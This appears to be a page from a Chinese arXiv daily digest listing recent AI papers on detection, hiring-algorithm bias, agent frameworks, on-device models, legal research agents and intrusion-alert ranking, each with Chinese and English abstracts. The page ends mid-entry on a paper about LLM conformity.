arXivDaily arXiv每日学术速递 周一至周五更新
重置
2605.25046 2026-05-27 cs.CV cs.AI 版本更新

TinyFormer: Preserving Tiny Objects in YOLO-DETR Hybrid Real-time Detectors

TinyFormer: 在YOLO-DETR混合实时检测器中保留小目标

Jun-Wei Hsieh, Meng-Yu Kao, Ghufron Wahyu Kurniawan, Kuan-Chuan Peng

发表机构 * College of Artificial Intelligence, National Yang Ming Chiao Tung University(国立阳明交通大学人工智能学院) Mitsubishi Electric Research Laboratories(三菱电机研究实验室)

AI总结 提出TinyFormer混合检测器,通过并行双融合模块(PBM)保留浅层高分辨率特征,并设计空间语义适配器(SSA)补偿粗粒度标记化导致的空间损失,在MS COCO上实现小目标检测精度提升。

详情
AI中文摘要

YOLO系列和基于DETR的检测器在小目标检测方面存在困难。YOLO风格的模型受益于高效的密集预测,但其大步长骨干网络可能会抑制深层特征图中的小目标实例,并使网格分配变得模糊。基于DETR的模型通过集合预测去除了手工设计的后处理,但它们在粗粒度标记网格上进行推理,其中小目标仅占据少数弱标记,在匹配过程中容易被忽略。为了解决这些局限性,我们提出了TinyFormer,一种统一的YOLO-DETR混合实时检测器,它结合了ViT表示、无NMS的集合预测和YOLO风格的金字塔颈部,以实现准确的小目标检测。TinyFormer引入了并行双融合模块(PBM),该模块从浅层阶段构建高分辨率捷径到特征金字塔,在多尺度融合过程中保留精细的空间细节。我们进一步设计了空间语义适配器(SSA)来补偿粗粒度标记化导致的空间损失。SSA从早期阶段提取高分辨率线索并将其注入Transformer标记嵌入中,从而在不牺牲DETR全局建模能力的情况下改进小目标定位。在MS COCO上的实验表明,TinyFormer持续优于最近的YOLO系列检测器和强大的DEIMv2基线。即使没有PBM,TinyFormer-X也达到了58.4%的AP,而添加PBM将整体AP提高到58.5%,并在小目标上带来了1.6%的AP增益。使用Objects365预训练,TinyFormer-X-PBM达到了60.2%的AP,以更少的参数和更低的计算量超越了RF-DETR和其他Objects365预训练的检测器。这些结果表明,TinyFormer弥合了密集的YOLO风格特征融合和DETR风格集合预测之间的差距,为实时小目标检测提供了强大的精度-效率权衡。代码可在https://github.com/mmpmmpmmpjosh/TinyFormer获取。

英文摘要

YOLO-series and DETR-based detectors struggle with tiny-object detection. YOLO-style models benefit from efficient dense prediction, but their large-stride backbones may suppress tiny instances in deep feature maps and make grid assignment ambiguous. DETR-based models remove hand-crafted post-processing through set prediction, yet they reason over coarse token grids, where tiny objects occupy only a few weak tokens and are easily overlooked during matching. To address these limitations, we propose TinyFormer, a unified YOLO--DETR hybrid real-time detector that combines ViT representations, NMS-free set prediction, and a YOLO-style pyramid neck for accurate small-object detection. TinyFormer introduces a Parallel Bi-fusion Module (PBM), which builds high-resolution shortcuts from shallow stages to the feature pyramid, preserving fine spatial details during multi-scale fusion. We further design a Spatial Semantic Adapter (SSA) to compensate for the spatial loss caused by coarse tokenization. SSA extracts high-resolution cues from early stages and injects them into transformer token embeddings, improving tiny-object localization without sacrificing the global modeling ability of DETR. Experiments on MS COCO show that TinyFormer consistently outperforms recent YOLO-series detectors and the strong DEIMv2 baseline. TinyFormer-X achieves 58.4% AP even without PBM, while adding PBM improves the overall AP to 58.5% and brings a 1.6% AP gain on small objects. With Objects365 pre-training, TinyFormer-X-PBM reaches 60.2% AP, surpassing RF-DETR and other Objects365-pretrained detectors with fewer parameters and lower computation. These results demonstrate that TinyFormer bridges dense YOLO-style feature fusion and DETR-style set prediction, providing a strong accuracy-efficiency trade-off for real-time tiny-object detection. Code is available at https://github.com/mmpmmpmmpjosh/TinyFormer.

2605.27371 2026-05-27 cs.CY cs.AI 版本更新

Algorithmic Monocultures in Hiring

招聘中的算法同质化

Rishi Bommasani, Sarah H. Bana, Kathleen A. Creel, Dan Jurafsky, Percy Liang

发表机构 * Stanford University(斯坦福大学) Chapman University(查普曼大学) Northeastern University(东北大学)

AI总结 研究招聘算法同质化导致相同个体和种族群体被拒绝的问题,通过分析300万求职者的400万份申请数据,发现明显的种族差异和结果同质性。

Comments Published at FAccT 2026. Website: https://algorithmichiring.github.io/

详情
AI中文摘要

许多雇主使用由少数几家算法供应商构建的算法筛选求职者。我们假设算法同质化导致相同的个体和相同种族群体的成员面临拒绝。我们获取并分析了一个包含300万求职者提交400万份申请的新数据集,所有申请均由同一供应商构建的算法筛选。我们发现求职者结果存在明显的种族差异。根据美国就业歧视标准,亚裔和黑人求职者提交的所有申请中,分别有14.74%和25.87%的申请提交给了对亚裔和黑人求职者产生不利影响的职位。个体也收到同质化的结果:在所有申请10个职位的求职者中,有4%被所有职位推荐拒绝,这一比例高于随机预期。为了更好地理解这种同质性,我们利用招聘算法的确定性可复制性,生成如果求职者申请所有职位本应获得的结果。我们表明,求职者需要广泛申请才能确保他们的申请被人审阅。

英文摘要

Many employers screen job applicants with algorithms built by the same few algorithm vendors. We hypothesize that algorithmic monoculture leads to the same individuals and members of the same racial groups facing rejection. We acquire and analyze a novel dataset of 3 million applicants submitting 4 million applications where all the applications are screened by algorithms built by the same vendor. We find clear racial disparities in applicant outcomes. Of all applications submitted by Asian and Black applicants, 14.74% and 25.87% are submitted to positions that adversely impact Asian and Black applicants, respectively, according to U.S. employment discrimination standards. Individuals also receive homogeneous outcomes: 4% of all applicants who apply to 10 positions are recommended for rejection from all positions, a rate higher than expected by chance. To better understand this homogeneity, we leverage the deterministic replicability of hiring algorithms to generate the outcomes applicants would have received if they applied to all positions. We show that applicants would need to apply widely in order to ensure their applications are considered by a human

2605.27366 2026-05-27 cs.AI cs.CL cs.LG cs.MA 版本更新

MUSE-Autoskill: Self-Evolving Agents via Skill Creation, Memory, Management, and Evaluation

MUSE-Autoskill: 通过技能创建、记忆、管理和评估实现自我进化智能体

Huawei Lin, Peng Li, Jie Song, Fuxin Jiang, Tieying Zhang

发表机构 * ByteDance Inc.(字节跳动公司) Rochester Institute of Technology(罗切斯特理工学院)

AI总结 提出MUSE-Autoskill框架,通过统一的技能生命周期(创建、记忆、管理、评估和优化)使LLM智能体持续提升任务解决能力,实验表明生命周期管理的技能可提高任务成功率、效率、复用性和跨智能体迁移。

Comments 30 pages, 8 figures, 13 tables, working in progress

详情
AI中文摘要

大型语言模型(LLM)智能体依赖可复用技能来解决复杂任务。然而,现有的技能创建方法将技能视为孤立和静态的工件,限制了其可复用性、可靠性和长期改进。我们提出了MUSE-Autoskill智能体(记忆利用技能进化),一个以技能为中心的智能体框架,让智能体通过统一的技能生命周期(创建、记忆、管理、评估和优化)持续提升任务解决能力。我们的框架使智能体能够按需创建技能,跨任务存储和复用技能,高效组织和选择技能,并通过单元测试和运行时反馈评估技能以进行持续优化。我们进一步引入了技能级记忆,为每个技能跨任务积累经验,从而实现更有效的复用和随时间适应。在SkillsBench上的实验提供了初步证据,表明生命周期管理的技能可以提高任务成功率、效率、复用性和跨智能体迁移,突出了将技能视为长期存在、具有经验意识和可测试资产的重要性。

英文摘要

Large language model (LLM) agents rely on reusable skills to solve complex tasks. However, existing skill creation approaches treat skills as isolated and static artifacts, limiting their reusability, reliability, and long-term improvement. We propose MUSE-Autoskill Agent (Memory-Utilizing Skill Evolution), a skill-centric agent framework that lets agents continuously improve their task-solving capability by creating, reusing, and refining skills under a unified lifecycle (creation, memory, management, evaluation, and refinement). Our framework enables agents to create skills on demand, store and reuse them across tasks, organize and select them efficiently, and evaluate them through unit tests and runtime feedback for continuous refinement. We further introduce skill-level memory that accumulates experience for each skill across tasks, enabling more effective reuse and adaptation over time. Experiments on SkillsBench provide initial evidence that lifecycle-managed skills can improve task success, efficiency, reuse, and cross-agent transfer, highlighting the importance of treating skills as long-lived, experience-aware, and testable assets.

2605.27361 2026-05-27 cs.AI cs.SY eess.SY 版本更新

Natural Language Query to Configuration for Retrieval Agents

面向检索代理的自然语言查询到配置

Melissa Z. Pan, Negar Arabzadeh, Mathew Jacob, Fiodar Kazhamiaka, Esha Choukse, Matei Zaharia

发表机构 * UC Berkeley(加州大学伯克利分校) University of Washington(华盛顿大学) Microsoft Azure Research - Systems(微软Azure研究 - 系统)

AI总结 提出BRANE方法,利用LLM将查询转换为工作负载特征,并训练轻量级预测器选择最优配置,在多个基准上实现成本-质量帕累托前沿的优化。

详情
AI中文摘要

现代检索代理暴露了许多配置选择——LLM、检索器、文档数量、跳数和合成策略——每个都影响答案质量和服务成本。目前,这些流水线通常针对每个工作负载手动调整一次,留下了大量每查询优化的空间。我们形式化了这个问题:给定一个自然语言查询以及一个准确性或预算目标,从预定义的流水线目录中选择在推理时最小化成本或最大化准确性的配置。我们提出了**BRANE**,它使用LLM将每个查询转换为工作负载特定的特征,然后训练一个轻量级的每配置预测器,估计流水线是否能正确回答查询。在推理时,**BRANE**选择最大化预测正确性(经成本惩罚)的配置,无需重新训练即可暴露可调的成本-质量权衡。在MuSiQue、BrowseComp-Plus和FinanceBench上,**BRANE**持续推动成本-质量帕累托前沿,以高达89%的成本降低匹配最佳固定配置的准确性,并优于LLM路由、基于规则和微调的Qwen3-4B基线。这些结果表明,对整个检索流水线进行每查询配置是静态工作负载级调优的实用替代方案。

英文摘要

Modern retrieval agents expose many configuration choices -- LLM, retriever, number of documents, number of hops, and synthesis strategy -- each shaping both answer quality and serving cost. Today, these pipelines are typically hand-tuned once per workload, leaving substantial per-query optimization untapped. We formulate the problem: given a natural-language query and either an accuracy or a budget target, select from a predefined pipeline catalog the configuration that minimizes cost or maximizes accuracy at inference time. We propose **BRANE**, which uses an LLM to convert each query into workload-specific characteristics, then trains a lightweight per-configuration predictor that estimates whether the pipeline will answer the query correctly. At inference time, **BRANE** selects the configuration that maximizes predicted correctness penalized by cost, exposing a tunable cost-quality tradeoff without retraining. Across MuSiQue, BrowseComp-Plus, and FinanceBench, **BRANE** consistently pushes the cost-quality Pareto frontier, matches the best fixed configuration's accuracy at up to 89% lower cost, and outperforms LLM-routing, rule-based, and fine-tuned Qwen3-4B baselines. These results show that per-query configuration of the full retrieval pipeline is a practical alternative to static workload-level tuning.

2605.27360 2026-05-27 cs.NI cs.AI 版本更新

GENESIS: Harnessing AI Agents for Autonomous 6G RAN Synthesis, Research, and Testing

GENESIS: 利用AI智能体实现自主6G RAN合成、研究与测试

Tamerlan Aghayev, Maxime Elkael, Michele Polese, Minh Dat Nguyen, Gabriele Gemmi, Andrea Lacava, Ali Saeizadeh, Reshma Prasad, Paolo Testolina, Angelo Feraudo, Soumendra Nanda, Pedram Johari, Salvatore D'Oro, Tommaso Melodia

发表机构 * Institute for Intelligent Networked Systems(智能网络系统研究所)

AI总结 提出GENESIS框架,通过智能体、技能和钩子三种可组合原语及知识层SYNAPSE,将意图转化为经空口实验验证的解决方案,以加速6G无线接入网研发。

Comments 18 pages, 16 figures

详情
AI中文摘要

蜂窝研究与开发受制于六个结构性流程,每个流程每次迭代需要数月的体力工程工作:(i) 将标准或研究论文中的新特性综合为生产代码;(ii) 一致性测试和互操作性测试;(iii) 针对现场异常和多样化部署环境进行加固;(iv) 网络功能的数据驱动优化;(v) 发现并原型化未来标准的新波形、功能及能力;(vi) 保护协议栈免受漏洞攻击。尽管大型语言模型已将通用软件工程中类似的研发工作从数天压缩至数分钟,但其已知缺陷在无线接入网用例中更为严重:它们会幻觉应用程序编程接口并误读规范,导致RAN组件在第一次错误时即失去互操作性,并且它们严重依赖仿真来设计算法,而仿真在迁移到真实硬件时往往失效。为应对这些挑战,我们提出GENESIS,一个智能体人工智能框架,将意图(如规范条款、遥测异常或研究假设)转化为经空口实验验证的解决方案,并反馈到持久知识库中。GENESIS建立在三种可组合原语(智能体、技能、钩子)和一个知识层(SYNAPSE)之上,该知识层既作为事实来源,也作为框架产生的所有工件的接收者,使能力在多次运行中累积。

英文摘要

Cellular research and development (R&D) is throttled by six structural processes that each consume months of manual engineering work per iteration: (i) synthesizing new features from standards or research papers into production code; (ii) conformance and interoperability testing; (iii) hardening against field anomalies and diverse deployment environments; (iv) data-driven optimization of network functionalities; (v) discovering and prototyping novel waveforms, functionalities, and capabilities for future standards; and (vi) securing the stack against vulnerabilities. Although Large Language Models (LLMs) have compressed comparable R&D work in general software engineering from days to minutes, their known pitfalls worsen on Radio Access Network (RAN) use cases: they hallucinate Application Programming Interfaces (APIs) and mis-read specifications, which kills interoperability of RAN components at the first mistake, and they heavily rely on simulations for designing algorithms, which is notorious for breaking when transferred to real hardware. To address these challenges, we present GENESIS, an agentic Artificial Intelligence (AI) framework that converts intents (e.g., a specification clause, a telemetry anomaly, or a research hypothesis) into solutions validated with over-the-air experiments, fed back into a persistent knowledge base. GENESIS is built on three composable primitives (agents, skills, hooks) and a knowledge layer (SYNAPSE) that doubles as the source of ground truth and the recipient of every artifact the framework produces, making capabilities compound across runs.

2605.27358 2026-05-27 cs.LG cs.AI cs.CL 版本更新

MobileMoE: Scaling On-Device Mixture of Experts

MobileMoE: 扩展设备端混合专家模型

Yanbei Chen, Hanxian Huang, Ernie Chang, Jacob Szwejbka, Digant Desai, Zechun Liu, Vikas Chandra, Raghuraman Krishnamoorthi

发表机构 * Meta AI

AI总结 针对设备端部署,提出MobileMoE系列子十亿参数MoE语言模型,通过联合优化架构和四阶段训练,在14个基准上匹配或超越领先的密集模型和MoE模型,并在智能手机上实现高效推理。

详情
AI中文摘要

混合专家(MoE)已成为千亿参数语言模型的事实标准架构,但其在十亿以下规模用于设备端部署的优势尚未得到充分探索。为弥补这一差距,我们提出MobileMoE,一系列设备端MoE语言模型,具有子十亿激活参数(0.3-0.9B激活,1.3-5.3B总参数),为设备端LLM建立了新的帕累托前沿。我们首先制定了一个设备端MoE缩放定律,在移动内存和计算约束下联合优化MoE架构,识别出一个设备端最佳点——具有细粒度和共享专家的适度稀疏性——同时实现内存和计算最优。基于推导出的架构,我们采用四阶段方案训练MobileMoE,包括预训练、中期训练、指令微调和量化感知训练,全部使用开源数据集。在14个基准上,MobileMoE匹配或超越领先的设备端密集LLM,推理FLOPs减少2-4倍,并以最多60%的参数匹配或超越最先进的MoE模型OLMoE-1B-7B。为弥合移动部署的最后一步,我们提供了首个在商用智能手机上的高效MoE推理,并进行了全面的设备端性能分析。在相当的INT4权重内存下,MobileMoE-S的预填充速度比密集基线MobileLLM-Pro快1.8-3.8倍,解码速度快2.2-3.4倍。

英文摘要

Mixture-of-Experts (MoE) has become the de facto architecture for hundred-billion-parameter language models, yet its advantages at sub-billion scales for on-device deployment remain largely unexplored. To close this gap, we present MobileMoE, a family of on-device MoE language models with sub-billion active parameters (0.3-0.9B active and 1.3-5.3B total) that establish a new Pareto frontier for on-device LLMs. We first formulate an on-device MoE scaling law that jointly optimizes MoE architecture under mobile memory and compute constraints, identifying an on-device sweet spot - moderate sparsity with fine-grained and shared experts - that is simultaneously memory and compute-optimal. Building on the derived architectures, we train MobileMoE with a four-stage recipe covering pre-training, mid-training, instruction fine-tuning, and quantization-aware training, all on open-source datasets. Across 14 benchmarks, MobileMoE matches or exceeds leading on-device dense LLMs with 2-4$\times$ fewer inference FLOPs, and matches or surpasses the state-of-the-art MoE OLMoE-1B-7B with up to 60% fewer parameters. To bridge the last mile to mobile deployment, we provide the first efficient MoE inference on commodity smartphones with comprehensive on-device profiling. At comparable INT4 weight memory, MobileMoE-S delivers $1.8$-$3.8\times$ faster prefill and $2.2$-$3.4\times$ faster decode than the dense baseline MobileLLM-Pro.

2605.27354 2026-05-27 cs.LG cs.AI cs.CL 版本更新

Guiding LLM Post-training Data Engineering with Model Internals from Sparse Autoencoders

利用稀疏自编码器的模型内部状态指导LLM后训练数据工程

Yi Jing, Zao Dai, Jinwu Hu, Zijun Yao, Lei Hou, Juanzi Li, Xiaozhi Wang

发表机构 * Tsinghua University(清华大学)

AI总结 提出SAERL框架,通过稀疏自编码器提取模型内部状态,建模数据多样性、难度和质量,用于强化学习数据工程,提升准确率并减少训练步数。

详情
AI中文摘要

模型内部状态编码了大型语言模型(LLM)处理其训练数据时的丰富信息;然而,后训练数据工程主要依赖外部信号,忽略了模型内部状态中丰富的内在信号。我们提出了SAERL,一个用于LLM强化学习(RL)的数据工程框架。它使用稀疏自编码器(SAE)这一先进的机制可解释性工具提取的模型内部状态,建模三种内在数据属性:多样性、难度和质量。每个属性支撑一个具体的数据工程操作:用于批次多样性控制的SAE空间聚类与适度批次混合、用于从易到难课程排序的难度代理,以及用于数据过滤的质量探针。SAERL在Qwen2.5-Math-1.5B上相比原始GRPO平均准确率提升3.00%,并以减少20%的训练步数达到目标准确率,在模型规模和RL算法上均有一致收益。实验表明,SAE在不同模型家族和规模间有效迁移,作为一种轻量级且可重用的数据工程工具。这些结果证明,模型内部状态是后训练数据工程中强大且实用的信号来源。

英文摘要

Model internals encode rich information about how a large language model (LLM) processes its training data; however, post-training data engineering largely relies on external signals and ignores rich intrinsic signals lying in model internals. We propose SAERL, a data engineering framework for LLM reinforcement learning (RL). It models three intrinsic data properties: diversity, difficulty, and quality, using model internals extracted with Sparse Autoencoder (SAE), an advanced mechanistic interpretability tool. Each property grounds a concrete data engineering operation: SAE-space clustering with moderate batch mixing for batch diversity control, a difficulty proxy for easy-to-hard curriculum ordering, and a quality probe for data filtering. SAERL improves average accuracy by 3.00% over vanilla GRPO and reaches target accuracy with 20% fewer training steps on Qwen2.5-Math-1.5B, with consistent gains across model scales and RL algorithms. Experiments show that SAE transfers effectively across model families and scales, serving as a lightweight and reusable data engineering tool. These results demonstrate that model internals are a powerful and practical source of signals for post-training data engineering.

2605.27338 2026-05-27 cs.AI cs.CC cs.CL cs.LO 版本更新

2-ASP(Q) programs with weak constraints: Complexity and efficient implementation

带有弱约束的2-ASP(Q)程序:复杂性与高效实现

Andrea Cuteri, Giuseppe Mazzotta, Francesco Ricca

发表机构 * University of Calabria(卡拉布里亚大学) Rende Italy(意大利伦德)

AI总结 本文研究了带有两个量词和弱约束的ASP(Q)程序(2-ASP(Q)^w)的复杂性,并提出基于CEGAR技术的Casper系统实现策略,实验证明其有效性。

详情
AI中文摘要

ASP(Q)通过回答集上的量词扩展了回答集编程(ASP)。本文聚焦于带有两个量词和弱约束的ASP(Q)程序类,记为2-ASP(Q)^w。2-ASP(Q)^w是ASP(Q)的一个实际相关片段,其表达能力足以捕获直到类Delta_3^P的优化问题。在理论方面,我们提供了2-ASP(Q)^w程序主要计算任务的完整复杂性刻画,包括紧致完备性结果以及对先前工作未涉及的非平凡情况的分析。在实践方面,我们引入了在Casper系统中计算(最优)量化回答集的新策略,该策略依赖于针对ASP(Q)定制的反例引导抽象精化(CEGAR)技术。来自不同应用领域的硬基准测试的实验评估表明,所提出的技术在实践中是有效的。

英文摘要

ASP(Q) extends Answer Set Programming (ASP) with Quantifiers over answer sets. In this paper we focus on the class of ASP(Q) programs with two quantifiers and weak constraints, denoted as 2-ASP(Q)^w. 2-ASP(Q)^w is a practically relevant fragment of ASP(Q) that is expressive enough to capture optimization problems up to the class Delta_3^P. On the theoretical side, we provide a complete complexity characterization of the main computational tasks for 2-ASP(Q)^w programs, including tight completeness results and the analysis of nontrivial cases that have not been addressed in previous works. On the practical side, we introduce novel strategies for computing (optimal) quantified answer sets in the Casper system, that rely on a Counterexample-Guided Abstraction Refinement (CEGAR) technique tailored to ASP(Q). An experimental evaluation on hard benchmarks from different application domains shows that the proposed techniques are effective in practice.

2605.27332 2026-05-27 cs.SE cs.AI cs.CV 版本更新

EdgeFlow: Edge-Map Augmented VLM-Based Flowchart Processing for Industrial Requirements Engineering

EdgeFlow: 基于边缘图增强的VLM流程图处理用于工业需求工程

Zhifei Dou, Shabnam Hassani, Ou Wei

发表机构 * Huawei Research Canada(华为加拿大研究)

AI总结 提出EdgeFlow方法,通过向视觉语言模型(VLM)输入添加Canny边缘图作为结构先验,无需训练数据或微调即可提升流程图到Mermaid代码的转换精度,在工业数据集上节点F1提升17.39%,边F1提升16.94%。

Comments 10 pages

详情
AI中文摘要

流程图广泛应用于工业需求中,但通常以静态图像形式嵌入。视觉语言模型(VLM)在将这些流程图转换为机器可读模型以支持需求工程活动方面显示出潜力,然而,当直接应用于流程图转换时,它们常常在拓扑关键视觉细节上失败。为了解决这个问题,我们提出了EdgeFlow,它通过向VLM的原始输入添加确定性提取的Canny边缘图——作为结构先验——来改进流程图到Mermaid的转换,无需标注训练数据或领域特定的模型微调。我们在IndusReqFlow(一个来自真实世界需求的数据集)上评估了EdgeFlow。与现成的VLM相比,EdgeFlow将节点级F1提高了17.39个百分点,边级F1提高了16.94个百分点。在路径级别,EdgeFlow将路径F1提高了11.06个百分点,从而更好地支持基于模型的测试。这些结果表明,EdgeFlow提供了一种实用的、无需训练的方法,用于改进工业需求工程中保持拓扑结构的流程图到Mermaid转换。在公共合成基准上的跨数据集评估结果显示没有显著改进;这凸显了需要包含工业数据的多样化基准,以全面评估未来基于VLM的需求工程工具。

英文摘要

Flowcharts are widely used in industrial requirements, but usually remain embedded as static images. Vision Language Models (VLMs) show promise in the conversion of these flowcharts into machine-readable models for RE activities, yet, when directly applied to flowchart conversion, they often fail on topology-critical visual details. To address this, we propose EdgeFlow that augments a VLM's original input with a deterministically extracted Canny edge map-acting as a structural prior-to improve flowchart-to-Mermaid conversion, without requiring annotated training data or domain-specific model fine-tuning. We evaluate EdgeFlow on IndusReqFlow, a dataset sourced from real-world requirements. Compared with off-the-shelf VLMs, EdgeFlow improves node-level F1 by 17.39 percentage points and edge-level F1 by 16.94 percentage points. At the path level, EdgeFlow improves path F1 by 11.06 percentage points, enabling better support for model-based testing. These results demonstrate that EdgeFlow provides a practical, training-free means to improve topology-preserving flowchart-to-Mermaid conversion for industrial RE. Cross-dataset evaluation results on a public synthetic benchmark show no significant improvement; this highlights the need for diverse benchmarks incorporating industrial data for the comprehensive evaluation of future VLM-based RE tools.

2605.27331 2026-05-27 cs.AI 版本更新

Maat: The Agentic Legal Research Assistant for Competition Protection

Maat: 面向竞争保护的法律研究智能助手

Basant Mounir, Farida Madkour, Amira Abdelaziz, Asmaa Sami

发表机构 * Cairo Egypt(开罗埃及)

AI总结 提出Maat,一种基于ReAct框架的智能法律研究助手,通过RAG、网络搜索和用户澄清机制,在竞争法案例检索中显著优于现有通用和专用法律助手。

Comments 5 pages, 1 figure

详情
AI中文摘要

进行法律研究的竞争法专家必须查阅大量案例、决定和司法报告,以识别先例并评估竞争和合并案件中的关键要素。尽管通用研究助手(如Claude和ChatGPT)和法律助手(如SaulLM-7B和LegalGPT)越来越多地被用于辅助法律研究,但它们在竞争法分析方面仍然不足:缺乏专门的领域知识,提供不充分的官方引用,或虚构竞争法案例。我们提出Maat,一个ReAct智能体,它协调与研究过程不同任务对应的工具。Maat与竞争法专家迭代设计,使用RAG将案例和发现基于官方来源以确保可靠性,提供丰富的行内引用,在数据库覆盖不足时回退到网络搜索,并在查询模糊时提示用户澄清。Maat在案例特定任务上显著优于所有基线助手,在理论问题任务上表现与最佳基线相当。所使用的数据集可在GitHub上获取。

英文摘要

Competition law experts conducting legal research must review extensive volumes of cases, decisions, and judicial reports to identify precedents and assess key elements in competition and merger cases. Although general research assistants such as Claude and ChatGPT and legal assistants such as SaulLM-7B and LegalGPT are increasingly used to assist legal research, they remain inadequate for competition law analysis: they lack specialized domain expertise, provide insufficient official citations, or hallucinate competition law cases. We propose Maat, a ReAct agent that orchestrates tools corresponding to different tasks of the research process. Designed iteratively with competition law experts, Maat grounds cases and findings in official sources using RAG for reliability, provides rich in-line citations, falls back to web search when database coverage is insufficient, and prompts the user for clarification when queries are ambiguous. Maat significantly outperforms all baseline assistants on case-specific tasks and performs within range of the top baseline on theoretical question tasks. The dataset used is available on GitHub.

2605.27328 2026-05-27 cs.SE cs.AI cs.MA 版本更新

Governed Evolution of Agent Runtimes through Executable Operational Cognition

通过可执行操作认知实现代理运行时的受控演化

Mariano Garralda-Barrio

发表机构 * Independent Researcher(独立研究者)

AI总结 本文提出一个框架,通过可执行操作认知实现多智能体系统中代理生成工件的受控运行时演化,引入HarnessMutation机制在验证、可追溯、评估和回滚约束下进行生命周期感知的运行时适应。

Comments 14 pages, 4 figures, 1 table. Reference implementation and associated source code available at: https://github.com/mgarralda/governed-runtime

详情
AI中文摘要

近期智能体系统的进展越来越将代码视为可执行的操作基底,而非可丢弃的输出工件。先前的工作如\emph{Code as Agent Harness}将经过验证的智能体生成工件视为运行时实体,可以在长时间运行的认知循环中创建、执行、修订、持久化和重用。然而,这些工件的治理、生命周期管理和操作演化仍未被充分定义。 本文提出了一个通过可执行操作认知实现多智能体系统中受控运行时演化的框架。我们将智能体生成工件形式化为持久的运行时能力,这些能力逐渐成为操作基底的一部分,而非瞬时的中间输出。基于这一视角,我们引入了\emph{HarnessMutation}作为一种受控机制,用于在明确的验证、可追溯性、评估和回滚约束下进行生命周期感知的运行时适应。 该框架不将运行时适应视为无限制的自我修改,而是将演化建模为在持久操作记忆上的有界且可观察的过程。它进一步展示了这些思想如何在现代智能体运行时和面向治理的编排系统上实现,为适应性基础设施提供了概念基础,使其演化保持明确、可审计且受约束。

英文摘要

Recent advances in agentic systems increasingly treat code as an executable operational substrate rather than as a disposable output artifact. Prior work such as \emph{Code as Agent Harness} frames validated agent-generated artifacts as runtime entities that can be created, executed, revised, persisted, and reused within long-running cognitive loops. However, the governance, lifecycle management, and operational evolution of such artifacts remain under-specified. This paper proposes a framework for governed runtime evolution in multi-agent systems through executable operational cognition. We formalize agent-generated artifacts as persistent runtime capabilities that progressively become part of the operational substrate rather than transient intermediate outputs. Building on this perspective, we introduce \emph{HarnessMutation} as a governed mechanism for lifecycle-aware runtime adaptation operating under explicit validation, traceability, evaluation, and rollback constraints. Rather than treating runtime adaptation as unrestricted self-modification, the proposed framework models evolution as a bounded and observable process over persistent operational memory. It further shows how these ideas can be operationalized over modern agent runtimes and governance-oriented orchestration systems, providing a conceptual foundation for adaptive infrastructures whose evolution remains explicit, auditable, and constrained.

2605.27320 2026-05-27 cs.AI cs.CY econ.GN q-fin.EC 版本更新

Modeling Agentic Technical Debt and Stochastic Tax: A Standalone Framework for Measurement, Simulation, and Dashboarding

建模代理技术债务与随机税:一个用于测量、模拟和仪表盘展示的独立框架

Muhammad Zia Hydari, Raja Iqbal, Narayan Ramasubbu

发表机构 * School of Business, University of Pittsburgh(匹兹堡大学商学院)

AI总结 本文提出一个形式化且可管理的框架,区分代理技术债务(累积的设计与治理负债存量)与随机税(使用随机代理时产生的运营负担流),并通过应付账款模拟和电子表格说明其应用。

详情
AI中文摘要

代理AI系统将概率推理与通过工具、上下文、记忆、编排和外部工作流集成进行的委托行动相结合。本文开发了一个形式化且可管理的模型,区分了代理技术债务与随机税。代理技术债务是累积的设计与治理负债存量。随机税是在业务流程中使用随机代理时产生的重复性运营负担流。这两个概念相关但不同:债务可能放大税收,而即使债务最小化,税收仍可能为正。本文从一个紧凑的仪表盘表达式开始,将其扩展为更完整的结构模型,定义所有变量和参数,展示如何从运营数据中估算每个成本类别,并通过应付账款模拟和配套电子表格说明该框架。

英文摘要

Agentic AI systems combine probabilistic reasoning with delegated action through tools, context, memory, orchestration, and external workflow integration. This note develops a formal and managerially usable model that distinguishes Agentic Technical Debt from Stochastic Tax. Agentic Technical Debt is a stock of accumulated design and governance liability. Stochastic Tax is a recurring flow of operating burden that arises when stochastic agents are used in business workflows. The two constructs are related, but they are not the same: debt can amplify the tax, while the tax can remain positive even when debt is minimized. The note starts from a compact dashboard expression, expands it into a fuller structural model, defines all variables and parameters, shows how each cost category can be estimated from operational data, and illustrates the framework with an accounts-payable simulation and companion spreadsheet.

2605.27299 2026-05-27 cs.CR cs.AI cs.HC cs.LG cs.SY eess.SY 版本更新

Risk Averse Alert Prioritization for IDS Using Subnormal Gaussian Fuzzy Models

使用次正态高斯模糊模型的IDS风险规避警报优先级排序

Murat Moran

AI总结 提出基于次正态高斯模糊数的警报优先级排序框架,通过建模威胁严重性、检测置信度和组织风险态度三种不确定性,利用排序指数实现可调安全姿态,实验证明在检测器退化下比基线方法更鲁棒。

详情
AI中文摘要

现代入侵检测系统每天生成数千条警报,但由于误报或低影响事件过多,警报疲劳严重限制了安全运营的有效性。我们通过提出一个基于次正态高斯模糊数的原则性警报优先级排序框架来解决这个问题,该框架明确建模了三种不确定性来源:威胁严重性、检测置信度和组织风险态度。每个警报被表示为一个模糊数,其核心表示严重性,展度表示不确定性,高度反映检测可靠性。我们应用排序指数对警报进行优先级排序,允许组织通过风险态度参数调整安全姿态。在CIC-IDS2017和NSL-KDD上的实验验证表明,在检测器退化下,该方法比基线方法具有更强的鲁棒性(NDCGrel@100为0.9963对比0.8215),在中等置信度警报中具有明显区分度,在稳健检测器下与基线方法接近。该框架具有理论基础、计算效率高、提供可解释推理,并且在检测器系列和校准错误场景下保持鲁棒性。

英文摘要

Modern intrusion detection systems generate thousands of alerts daily, but alert fatigue severely limits security operations effectiveness due to too many false positives or low-impact events. We address this by proposing a principled framework for alert prioritization based on subnormal Gaussian fuzzy numbers, explicitly modeling three sources of uncertainty: threat severity, detection confidence, and organizational risk attitude. Each alert is represented as a fuzzy number with the core indicating severity, spread indicating uncertainty, and height reflecting detection reliability. We apply ranking indices to prioritize alerts, allowing organizations to tune security posture through a risk-attitude parameter. Experimental validation on CIC-IDS2017 and NSL-KDD demonstrates greater robustness than baselines under detector degradation (0.9963 vs 0.8215 NDCGrel@100), with distinct differentiation in mid-confidence alerts and near-parity with baselines under robust detectors. The framework is theoretically grounded, computationally efficient, provides interpretable reasoning, and remains robust across detector families and miscalibration scenarios.

2605.27288 2026-05-27 cs.CL cs.AI cs.LG 版本更新

It's Not Always Sycophancy: Measuring LLM Conformity as a Function of Epistemic Uncertainty

并非总是谄媚:基于认知不确定性测量LLM的从众行为

Kevin H. Guo, Chao Yan, Avinash Baidya, Katherine Brown, Xiang Gao, Juming Xiong, Zhijun Yin, Bradley A. Malin

